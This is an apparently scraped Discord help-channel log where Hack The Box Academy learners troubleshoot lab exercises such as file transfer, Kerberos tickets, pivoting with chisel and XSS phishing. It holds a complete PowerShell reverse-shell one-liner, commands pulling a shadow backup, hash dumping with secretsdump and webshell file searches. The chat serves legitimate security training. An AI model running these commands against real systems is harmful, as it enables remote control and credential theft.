#

Maybe I'll keep it for tomorrow then. Similiar task is waiting

wary tendon
fathom pendant
rustic sage
wary tendon
fathom pendant
#

Not gonna guide you

rustic sage
#

Anyways guysm thank you so much! You saved me good night sleep

fathom pendant
#

Just tell you to file transfer

rustic sage
#

Have a grate day / morning /evening or night

#

great

wary tendon
fathom pendant
#

The backup is in a user directory

wary tendon
#

i got into backups

wary tendon
fathom pendant
#

And how are you trying to transfer?

#

What errors are you getting

wary tendon
#

permission denied

high zinc
fathom pendant
wary tendon
#

will

#

ls -al

#

cd .backups

#

ls

fathom pendant
#

And you are that user, yes?

wary tendon
#

will@nix01

#

yes

wary tendon
acoustic owl
glacial dragon
#

hello guys

wary tendon
wary tendon
glacial dragon
#

im stuck at Footprinting lab-Hard

#

when i try to ssh

#

this is what i get

naive wadi
fathom pendant
#

Does it have the ----BEGIN AND ----END lines

wary tendon
wary tendon
fathom pendant
wary tendon
#

oh my bad

fathom pendant
#

Especially when it's unrelated to me trying to help you

glacial dragon
#

thanks my man

wary tendon
#

understood

sly dome
#

just do transfer files module

wise elk
#

Hello everyone, I feel enlivened to be part of the HTB Discord community, as a beginner in InfoSec I have high anticipations for what my learning out come would be as a member of this community, especially as I'm choosing to go by the 'playing by the rules' doctrine in mind.

wary tendon
#

i have done about every transfer method and its not working

sly dome
wary tendon
#

i keep trying and it just gets me further into some hole

fathom pendant
#

Did you specify the port?

acoustic owl
tight mesa
#

hey anybody know how to authenticate as a different user into PowerShell?

fathom pendant
#

I think it's runas?

tight mesa
#

lemme try it

#

thanks btw

fathom pendant
#

I just used google ¯_(ツ)_/¯

tight mesa
#

ok., my google skills sucks.....

waxen kayak
#

feel like I am missing something with x64dbg... how does one get the entries to stop bouncing around in the memory map? I've tried pausing with no luck. I can't reasonably read any of the content in there because it just bounces around so much.

wise elk
#

Thanks for the tip @acoustic owl , a yellow exclamation mark, gave a notification after I finished reading the rules, to say hello and I decided to go with the flow. I'll be on the verification process now.

fathom pendant
#

Not necessarily a setup thing

#

It "recommends" you to do something

fathom pendant
wary tendon
#

no but it shows a 404 error when trying to send it

#

using python server p 8000

gleaming python
#

whats above "hacker" in htb?

wary tendon
#

will@nix01:~$ wget 10.10.15.16:8000/shadow.bak
--2023-10-21 21:44:48-- http://10.10.15.16:8000/shadow.bak
Connecting to 10.10.15.16:8000... connected.
HTTP request sent, awaiting response... 404 File not found
2023-10-21 21:44:48 ERROR 404: File

fathom pendant
#

Yeah you're just dumb @wary tendon

wise elk
#

@fathom pendant I get that now, I have some learning to do that is. The discord UI most especially.

fathom pendant
#

You need to start the http server from the .backups directory

#

And do wget from your attack machine

#

Wget is a DOWNLOAD command

wary tendon
#

cd /home

#

oops lol

fathom pendant
#

Just do cd or cd ~

#

That's the quickest way to get to user home

sly dome
#

how did you make your way until thay section

fathom pendant
sudden blaze
#

having troubles listing shares:root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_HRJDux
Default principal: julio@INLANEFREIGHT.HTB
So i have a valid ticket for julio but cant list shares smbclient //dc01/C$ -k -c ls -no-pass
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER
What am i doing wrong

fathom pendant
#

Ticket is probably expired

sudden blaze
#

so i have to use the other one maybe

fathom pendant
#

Maybe, if you check the info it tells you when it expires

#

One is old, one is new

sudden blaze
#

if i check info i got an error: klist -k -t krb5cc_647401106_HRJDux
Keytab name: FILE:krb5cc_647401106_HRJDux
klist: Unsupported key table format version number while starting keytab scan

#

or how do i get info about it?

fathom pendant
#

Read the module

sudden blaze
#

ok

muted lotus
#

ticket is expired

sudden blaze
#

Listing keytab File Information: klist -k -t Do you mean this command

#

i cant see julios tickets

fathom pendant
#

Iirc shouldn't matter

sudden blaze
#

ah ok

muted lotus
#

you need to find the path where is the ticket

sudden blaze
#

its in /tmp

muted lotus
#

yes, and you need to verify if the ticket is valid or not

sudden blaze
#

verifying by trying each ticket of julio?

fathom pendant
#

You don't need the -k

#

Also, not all the tickets are Julios

#

I don't think

sudden blaze
#

yeah there are two of him

fathom pendant
#

Yep one is expired one isn't

sudden blaze
#

so i have to guess

#

or is there a command when it expires

fathom pendant
#

Should be able to use klist

#

I forget though if the files in tmp have a file extension or not

sudden blaze
#

no they dont

#

gpt say flag -c

#

🙂

muted lotus
#

with klist you will see "Valid starting" "Expires" this will tell you if the ticket is valid or not

fathom pendant
sudden blaze
#

ah i see

fathom pendant
#

You can also do -f to see the flags present

surreal iron
#

Hi guys, sorry If I missed an answer somewhere: Im using htba workstation, Im doing xss module rn and I cant make netcat listen to port 80 as it is occupied (killing the processes was a bad idea, I tried three times), and I cant reroue the traffic to port 8080. Is this technically possible (meaning Im doing something wrong), or such tasks are better be solved on my own vm/system?

quaint hemlock
fathom pendant
#

The pwnbox uses port 80 for the vnc client to reach you to use it

surreal iron
fathom pendant
#

Wdym "reroute"

#

If you're having netcat listen on 8080 you're not 'rerouting' anything

#

And all you'd have to do for revshell stuff is modify the port you use to be 8080

junior sparrow
#

Hey, can anyone here help me solving an easy machine?

#

I'm new and stuck

fathom pendant
junior sparrow
#

Oh I see

surreal iron
# fathom pendant Wdym "reroute"

well, I used "sudo sysctl -w net.ipv4.ip_forward=1" and "sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080"
Im stuck on "Phishing" part of xss module, where you need to send the malicious link to get the credentials

fathom pendant
#

If it's on either you need to use the tun0

#

As that's generally the interface that will have the 10.x.x.x subnet

surreal iron
#

thanks a lot

fathom pendant
#

How does the interface know to redirect... if nothing touches it

static roost
#

#Module: DACL Attack I
#Skills Assessment
Could use a sanity check here. I'm struggling with one of the tools I believe is needed to complete the last question. Can I DM anyone?

junior sparrow
#

@static roost I can try to help you with my poor skills if you're willing to help me as well 😅

misty current
#

I was able to pull the Wordlist earlier.

quaint hemlock
misty current
#

You're calling it directly. You need to instantiate an object from that class first using the new keyword.

#

@quaint hemlock Or you could directly invoke it during instantiation by calling the class constructor ||new Words().GetWordList()||

buoyant drum
#

I need some help with "Skills Assessment - File Upload Attacks" can I DM someone

quasi wave
#

Hi I took a couple weeks off from HTB Academy after getting stuck on the last lab of Nmap module so I think I wanna review whole module. Is there a walkthrough of entire module in one video? I couldn’t find one.

acoustic owl
quasi wave
#

Ok thanks

#

What do you recommend at this point? I have completed easy and medium Nmap labs and taken a couple weeks off of HTB and really want to complete the last lab and understand what I learn but I forgot prior knowledge of Nmap.

naive wadi
quasi wave
#

Ok thanks

#

Just reread whole module from start?

naive wadi
#

Thats what I would do to refresh my memory, but other people are different

quasi wave
#

Ok cool

naive wadi
quasi wave
#

Ok thanks

acoustic owl
#

There are sometimes situations when you don't understand what the author is trying to say. Then you watch a video or read a text by someone else who explains exactly the same thing, but in different words, and suddenly it clicks.
After that, you're sure to understand what the author was trying to say in the module.

naive wadi
#

@quasi wave @acoustic owl advice is really great

quasi wave
#

Ok thanks

tranquil axle
sterile epoch
#

which module covers detailed firewall evasion??

acoustic owl
sterile epoch
#

these are for scans. I needed some for reverse shells

acoustic owl
sterile epoch
#

ok thanks I was in the payloads and shells module so I thought of digging a little deeper

sterile epoch
#

Hi I am having trouble with the windows powershell reverse shell

#

i am getting an error when I run this command powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

#

I have disabled the firewall

#

I cannot upload the error code cause mee6 is removing them

#

this is one very short snippet

... stem.Net.Sockets.TCPClient('10.10.14.158',443); = .GetStream();[byte[ ...```
#

of the error

acoustic owl
acoustic owl
sterile epoch
#

shells and payload

#

reverse shell section

#

this is the error

acoustic owl
sterile epoch
#

ok

#

thanks it worked

#

I thought both were same and i preffered using pwsh in my system

acoustic owl
#

no, PowerShell and cmd.exe are not the same thing

sterile epoch
#

now I know

hazy grotto
#

Is there a way to reset the bloodhound default creds? I'm unable to login. It says my creds are stored in my browser but i can't seem to find them listed in firefox. I tried the steps in this page. https://neo4j.com/docs/operations-manual/current/configuration/password-and-user-recovery/#disable-authentication

But i don't see this option in the config file dbms.security.auth_enabled=false

I see one for bolt # Bolt SSL configuration
#dbms.ssl.policy.bolt.enabled=true
#dbms.ssl.policy.bolt.base_directory=certificates/bolt

Neo4j Graph Data Platform

This page describes how to reset a password to recover a user's access when their password is lost. It specifically focuses on how to recover an admin user if all the admin users have been unassigned the admin role, and how to recreate the built-in admin role if it has been dropped.

#

Could someone tag me if they have a solution please?

acoustic owl
sly dome
#

i finished Attacking Common Services - Hard Lab in less than 5 minutes and this was not even close to Hard, can someone double check me if i did the intended?

#

maybe in DM

acoustic owl
iron hazel
#

Hi, I am doing AD Skill Assessment and I am done with part I. I use impacket-secretsdump with credentials to dump hashes from machines and dc01. I understand on dc i need to use account with dcsync rights to dump. I don't understand on other machines, why some credentials worked and some don't (one that has dcsync rights can't be used to dump anything from another machine)

candid lily
#

is htb down?

sly dome
#

probably you have to pivot though some machine to reach the target

#

scheme like foothold -> pivot -> target

#

?

pearl crystal
#

Idk man

sly dome
#

i know

#

you just have to use another host as jump

#

probably that machines does not have route to 172.16.5.19

sudden blaze
#

Hello everyone! Having trouble setting up chisel correctly: i started chisel reverse server:./chisel server -p 1234 --socks5 --reverse -v
2023/10/22 06:40:32 server: Reverse tunnelling enabled
2023/10/22 06:40:32 server: Fingerprint bjWtlRu7rQvC4LPUhmFdppSQJOKgGf0u2qug0TOQlHE=
2023/10/22 06:40:32 server: Listening on http://0.0.0.0:1234
2023/10/22 06:40:44 server: session#1: Handshaking with 10.129.178.104:62447...
2023/10/22 06:40:45 server: session#1: Verifying configuration
2023/10/22 06:40:45 server: session#1: tun: Created (SOCKS enabled)
2023/10/22 06:40:45 server: session#1: tun: SSH connected
2023/10/22 06:40:45 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
Then in target: ./chisel client -v 10.10.15.38:1234 R:socks
2023/10/22 10:51:10 client: Handshaking...
2023/10/22 10:51:10 client: Sending config
2023/10/22 10:51:10 client: tun: SSH connected
But if i want to ping with proxychains it doesnt connect: roxychains ping inlanefreight.htb
ProxyChains-3.1 (http://proxychains.sf.net)
ERROR: ld.so: object 'libproxychains.so.3' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
PING inlanefreight.htb (172.16.1.15) 56(84) bytes of data.
^C
--- inlanefreight.htb ping statistics ---
9 packets transmitted, 0 received, 100% packet loss, time 8097ms
What am i doing wrong?

naive wadi
#

You can't ping over proxychains

#

Re-read module, check cheat sheet for commands

sudden blaze
#

i cant ping with proxychains? are you sure?

naive wadi
#

Yes

sly dome
#

icmp is layer 3

#

and socks is layer 5

naive wadi
#

You have to use NMAP

#

The type of scan is in the module

sly dome
#

you should take a look at how OSI model works

sudden blaze
#

ok

sly dome
#

layer 3 packets are encapsulated by layer 4 and then layer 5

naive wadi
#

You can use other tools but reread module and as @sly dome says read up om OSI. Professor messer has free videos

sly dome
#

also take a look at ligolo-ng, a tool that creates a tunnel using GVisor which works on layer 3

#

pivoting with it enables you to make ping and usual nmap scans like SYN scan

sudden blaze
#

Other question: kerberos config file: is it casesensitive?

#

like inanefreight.htb or INLANEFREIGHT.HTB

wooden dust
#

Hey, do the .lnk or .scf file method on SMB will work if the SMB host is linux-based?

sly dome
#

both are Windows' file extension

#

i dont know from there

sudden blaze
#

Hello everyone! Setup chisel server and client, but if i want to connect it cant resolve dc01.inlanefreight.htb even its in the host file. command: proxychains evil-winrm -i dc01 -r inlanefreight.htb

Info: Establishing connection to remote endpoint
|DNS-request| dc01.inlanefreight.htb
|DNS-request| fe80::1%enp0s3 What am i doing wrong?

#

what i am doing wrong?

sly dome
#

how much am i enjoying pivoting module with ligolo-ng

#

no words kek

acoustic owl
acoustic owl
sly dome
#

proxychains3 (the one that comes with Parrot) supports SOCKS5

acoustic owl
#

This one?
What's Jose's NTLM hash?

If yes, it has nothing to do with a DCSync

sly dome
#

i can help

#

lemme check notez

#

i just find the flag with the webshell

#

also i sent me a rev shell with Nishang invokeTCP

#

you have some useful commands to find files by name

#

what

#

with a simple PHP webshell you can use spaces in the GET/POST parameter

#

do it from the browser

#

use the source

#

ctrl + u

#

more comfy view

#

cmd=dir c:\

#

should work

#

what is your webshell?

#

worked?

#

now

#

use god mode enumeration

#

u know the file name

#

cmd=powershell gci -recurse -filter "flag.txt" -File

#

😉

sudden blaze
#

@acoustic owl even i use the ip it doesnt work

sly dome
#

any time dude

sudden blaze
#

@sly dome error exists even with proxychains3

sly dome
#

i dont know your problem, i only said that SOCKS5 supports UDP

#

and that the usual proxychains installation supports SOCKS5

sudden blaze
#

im trying to authenticate with kerbero ticket: proxychains3 evil-winrm -i 172.16.1.15 -r inlanefreight.htb

#

but it fails

cedar void
sly dome
#

no lab machine has internet access

sudden blaze
#

i setup both chisel server and client

hallow kiln
acoustic owl
#

||mimikatz|| is your friend

sly dome
#

for example im skipping all metasploit stuff xd

acoustic owl
hallow kiln
#

I really dislike Metasploit for pivoting

sly dome
sudden blaze
#

Im stuck for hours in trying to authenticate evil-winrm with kerberos auth over proxychains. I setup chisel server and client as well exported the ticket locally. But if ran command: proxychains evil-winrm -i dc01 -r inlanefreight.htb it always fails!

#

guess i followed all the steps in the section

rustic sage
#

Hello, I'm returning to the DNS section of the Footprinting module. I don't think I am getting all the information I should be, I suspect that the instance of the DNS server I am communicating with isn't communicating with another DNS server. I've included why I am thinking that, is this a reasonable suspicion?

└─$ dig afxr inlanefreight.htb @10.129.42.195   
;; communications error to 10.200.60.101#53: timed out
;; communications error to 10.200.60.101#53: timed out
;; communications error to 10.200.60.101#53: timed out

; <<>> DiG 9.19.17-1-Debian <<>> afxr inlanefreight.htb @10.129.42.195
;; global options: +cmd
sudden blaze
#

Modul:Password Attacks Section:Pass the ticket from linux optional exercise

acoustic owl
rustic sage
sly dome
#

you have your inlanefreight ip wrong in the hosts file